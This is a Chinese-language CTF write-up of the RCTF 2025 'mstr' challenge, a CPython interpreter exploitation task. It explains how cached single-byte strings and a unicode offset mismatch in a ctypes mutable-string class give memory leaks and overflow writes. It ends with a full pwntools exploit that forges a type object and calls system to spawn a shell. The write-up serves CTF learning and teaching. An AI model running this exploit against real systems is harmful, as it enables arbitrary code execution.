RCTF 2025 mstr Writeup
少见的 Python interpreter pwn,漏洞点也很有意思。
Challenge
Python 3.12.4
import ctypes
from typing import Union, List, Dict
STRPTR_OFFSET = 0x28
LENPTR_OFFSET = 0x10
class MutableStr:
pass
class MutableStr:
def __init__(self, data:str):
self.data = data
self.base_ptr = id(self.data)
self.max_size_str = ""
def set_max_size(self, max_size_str):
if int(max_size_str) < ((len(self)+7) & ~7):
self.max_size_str = max_size_str
else:
print("can't set max_size: too big")
def __repr__(self):
return self.data
def __str__(self):
return self.__repr__()
def __len__(self):
if self.base_ptr is None:
return 0
ptr = ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))
return ptr[0]
def __getitem__(self, key:int):
if not isinstance(key, int):
raise NotImplementedError
if key >= len(self) or key < 0:
raise RuntimeError("get overflow")
return self.data[key]
def __setitem__(self, key:int, value:int):
if not isinstance(value, int):
raise NotImplementedError("only support integer value")
if not isinstance(key, int):
raise NotImplementedError("only support integer key")
if key >= len(self) or key < 0:
raise RuntimeError(f"set overflow: length:{len(self)}, key:{key}")
strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
strptr[key] = value
def __add__(self, other:Union[str,MutableStr]):
if isinstance(other, str):
return MutableStr(self.data + other)
if isinstance(other, MutableStr):
return MutableStr(self.data + other.data)
raise NotImplementedError()
def _add_str(self, other):
if self.max_size_str == "":
max_size = (len(self)+7) & ~7
else:
max_size = int(self.max_size_str)
if len(self)+len(other) <= max_size:
other_len = len(other)
strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
otherstrptr = ctypes.cast(id(other) + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
for i in range(other_len):
strptr[i+len(self)] = otherstrptr[i]
if len(self)+other_len < max_size:
# strptr[len(self)+other_len] = 0
pass
ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))[0] += other_len
else:
print("Full!")
return self
def __iadd__(self, other):
if isinstance(other, str):
return self._add_str(other)
if isinstance(other, MutableStr):
return self._add_str(other.data)
return self
def new_mstring(data:str) -> MutableStr:
return MutableStr(data)
mstrings:List[MutableStr] = []
def main():
while True:
try:
cmd, data, *values = input("> ").split()
if cmd == "new":
mstrings.append(new_mstring(data))
if cmd == "set_max":
idx = int(values[0])
if idx >= len(mstrings) or idx < 0:
print("invalid index")
continue
mstrings[idx].set_max_size(data)
if cmd == "+":
idx1 = int(data)
idx2 = int(values[0])
if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
print("invalid index")
continue
mstrings.append(mstrings[idx1]+mstrings[idx2])
if cmd == "+=":
idx1 = int(data)
idx2 = int(values[0])
if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
print("invalid index")
continue
mstrings[idx1] += mstrings[idx2]
if cmd == "print_max":
idx = int(data)
if idx >= len(mstrings) or idx < 0:
print("invalid index")
continue
print(mstrings[idx].max_size_str)
if cmd == "print":
idx = int(data)
if idx >= len(mstrings) or idx < 0:
print("invalid index")
continue
print(mstrings[idx].data)
if cmd == "modify":
idx = int(data)
offset = int(values[0])
val = values[1]
if idx >= len(mstrings) or idx < 0:
print("invalid index")
continue
mstrings[idx][offset] = int(val)
except EOFError:
break
except Exception as e:
print(f"error: {e}")
print("hello!", flush=True)
main()省流:Python 的 str 不可变,题目用 ctypes 强行实现了一个可变字符串 MutableStr。
赛中手写了个 fuzzer,发现了一个很有意思的崩溃,但一直没看懂。(好在让我意识到 CPython 对单字节字符串有特别的优化,见下文。)
Hello!
> new O
> modify 0 0 0
这样就有可能 SIGSEGV,原因是空指针解引用。Bug
CPython 给每个单字节字符串预先分配了一个对象,位于 python 本身的数据段,所有相同的单字节字符串都指向同一个地方。如果我们先 new 一个 MutableStr '6',将另一个 MutableStr 的 max_size_str 设置成 '6',那么接下来改 '6' 就是改另一个 MutableStr 的 max_size_str。(考虑到最终 getshell 时的一些细节,需要用 6 而不是 7。)
Hello!
> new 6
> new 0
> set_max 6 1
> print_max 1
6
> += 0 0
> print_max 1
66我们由此可以获得任意长溢出写。
CPython 用 PyASCIIObject 存储纯单字节字符串,记录长度,不依赖尾空字节。如果字符串里有非 ASCII 字符,就会改用 PyCompactUnicodeObject,此时 0x28(STRPTR_OFFSET)偏移处新增两个 8 字节字段 utf8_length 和 utf8。(见源码 Python-3.12.4/Include/cpython/unicodeobject.h)
typedef struct {
PyObject_HEAD
Py_ssize_t length;
Py_hash_t hash;
struct {
unsigned int interned:2;
unsigned int kind:3;
unsigned int compact:1;
unsigned int ascii:1;
unsigned int statically_allocated:1;
unsigned int :24;
} state;
} PyASCIIObject;
typedef struct {
PyASCIIObject _base;
Py_ssize_t utf8_length;
char *utf8;
} PyCompactUnicodeObject;数据紧随这两个结构体之后(8 字节对齐)。CPython 存储 Unicode 字符采用定长编码,通常 UCS2(类似 UTF16),遇到大于两字节的字符则 UCS4。当 utf8 不为 NULL 时,print 就不再重新 UCS2 转 UTF8,而是直接根据这两个字段打印字符串。
但是 MutableStr 没有正确处理非 ASCII 情况,当拼接字符串时仍然向原偏移处即字符串末尾前 16 字节处写入字符串并且增加长度(注意 Python 的字符串长度是指 Unicode 码点数),我们可以结合篡改 max_size_str 从而泄露 Unicode 字符串 data 后任意偏移大约 16 字节的信息。
Exploit
笔者十分不喜欢 glibc heap pwn。以下解法不依赖特定 libc 版本,也没有 🏠。
每个 PyObject 都有一个 PyTypeObject 指针,表示对象的类型,其中有类型信息和各种操作的虚函数指针等。由于动态分配的对象在 pymalloc(不大于 512 字节)或 libc 堆上,所以理所应当可能有相邻对象的 PyTypeObject 指针,从而泄露 PIE 基址。
这里有个细节,当实际使用 print 命令打印这个字符串时,泄露出来的信息会变成其他字符。这是 builtin_print 时编码转换导致的,我们的脚本需要将实际输出的内容看做 UTF8 字节流再转为 UCS2 字节流以获取原始泄露信息。
得到基址后,我们再越界写篡改刚才提到的预先分配好的单字节字符串对象的 PyTypeObject 指针,提前伪造虚函数表,print 伪造了虚函数表的 data 从而劫持控制流。
Exp:
from pwn import *
context(arch='amd64', os='linux', log_level='debug', terminal = ['konsole', '-e'])
binary = './python'
io = process([binary, 'mstr.py'])
e = ELF(binary)
itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')
def new_bytes(content: bytes, index: int) -> None:
io.sendlineafter(b'> ', b'new ' + b'\x00' * len(content))
context.log_level='info'
for i, c in enumerate(content):
io.sendlineafter(b'> ', f'modify {index} {i} {c}'.encode())
context.log_level='debug'
io.sendlineafter(b'> ', 'new 瑞克'.encode())
io.sendlineafter(b'> ', 'new \x00'.encode()) # for fake type
io.sendlineafter(b'> ', 'new 6'.encode())
io.sendlineafter(b'> ', b'set_max 6 0')
io.sendlineafter(b'> ', b'set_max 6 1')
io.sendlineafter(b'> ', b'+= 2 2')
io.sendlineafter(b'> ', b'+= 2 2') # max size 6666
io.sendlineafter(b'> ', b'new ' + b'\x00' * 20)
io.sendlineafter(b'> ', '+= 0 3'.encode())
io.sendlineafter(b'> ', 'print 0'.encode())
data_leaked = io.recvline(drop=True).decode('utf-8').encode('utf-16-le')
# for i in range(0, len(data_leaked) - 8, 8):
# print(f'{u64(data_leaked[i: i + 8]):#x}')
e.address = u64(data_leaked[16:24]) - e.sym['PyBytes_Type']
if e.address % 0x1000 != 0:
exit(1)
print_leaked('elf_base', e.address)
gdb.attach(io, f'awa *{e.sym['_PyRuntime'] + 62000}')
# modify PyTypeObject ptr & construct fake PyTypeObject
new_bytes(b'cafebab' + cyclic(40).replace(b'caaadaaa', p64(e.sym['_PyRuntime'] + 62000)).replace(
# For some reasons, `ph\x00` will become `sh\x00` (+= 3)
b'aaaa', b'ph\x00\x00') + b'\x00' * 88 + p64(e.plt['system']), 4)
io.sendlineafter(b'> ', b'+= 1 4')
io.sendlineafter(b'> ', 'new \x01'.encode()) # fake type victim
io.sendlineafter(b'> ', 'print 5'.encode()) # invoke virtual function
io.interactive()由于堆布局每次运行时不同,只是有概率成功(如果加上堆喷可以做到每次成功)。
🐍🔥🐍🔥🐍🔥🐍🔥